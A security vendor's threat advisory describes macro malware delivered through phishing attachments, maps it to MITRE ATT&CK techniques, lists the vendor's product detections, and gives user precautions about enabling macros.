Macro is a set of commands that automates a software to perform a certain action. Threat actors took advantage of this and came up with Macro Malwares. This form of malware is known for being abusive of the VBA (Visual Basic for Application) programming in Microsoft Office macros to spread other forms of malware. These are often delivered through phishing emails, wherein the attacker lures the recipient to open the attached document. Once opened, security warning will show on the page and the document will instruct the recipient to “Enable Content”. After that, the macro will run and the recipient is affected.
What the malicious macro typically does upon enabling is that it executes a base64 PowerShell code which will download a file in %UserProfile% or in %Temp%. This downloaded file will run soon afterwards.
- Delivers other malware payloads
- Uses macro
- Steals computer data, computer name, system local, operating system (OS) version and running processes
- Compromised system security, with backdoor capabilities that can execute malicious commands
Sample Spam (Invoice Attachment)
Sample Document - "Enable Content"
- MS Word
- MS Excel
- MS Word
- MS Excel
MITRE ATT&CK Matrix
|Malware arrives as an attachment||Initial Access||T1566.001 Phishing: Spearphishing Attachment|
|Victim is lured into opening the attachment||Execution||T1204.002 User Execution: Malicious File|
|Downloaded document has obfuscated macros to hide URLs hosting the malware||Defense Evasion||T1027 Obfuscated Files or Information|
|Macro-enabled document will download and execute payload using powershell command||Execution||T1059.005 Command and Scripting Interpreter: Visual Basic|
T1059.001 Command and Scripting Interpreter: PowerShell
|Solution Modules||Solution Available||Pattern Branch||Release Date||Detection/Policy/Rules|
|Email Protection||Yes||AS Pattern 5630||August 28, 2020||-|
|URL Protection||Yes||In the Cloud||-||-|
|Advanced Threat Scan Engine (ATSE)||Yes||16.191.00||August 28, 2020||-|
|Predictive Learning (TrendX)||Yes||In the Cloud||-||Downloader.VBA.TRX.XXVBAF01FF009|
|File detection (VSAPI)||Yes||ENT OPR 16.191.00||August 28, 2020||Trojan.W97M.EMOTET.TIOIBEKL|
|Behavioral Monitoring (AEGIS)||Yes||TMTD OPR 2163||August 27, 2020||4560T|
Additional Threat Information Reference:
- Digital Guardian: What is Macro Malware?
- Trend Micro Blog: Macro Malware - Here’s what you need to know in 2016
- Blackberry ThreatVector Blog - Cylance Threat Alert: Donoff and Dridex
- Always enable/use macro security function on Microsoft Word and Excel.
- Be extremely cautious about enabling macros. If there is any doubt about the authenticity of an email urging you to download a Word or Excel document, forward the contents to a member of the IT staff.
- If you continuously receive email attachments with macro from spam campaigns, you may utilize IMSVA’s macro scanning.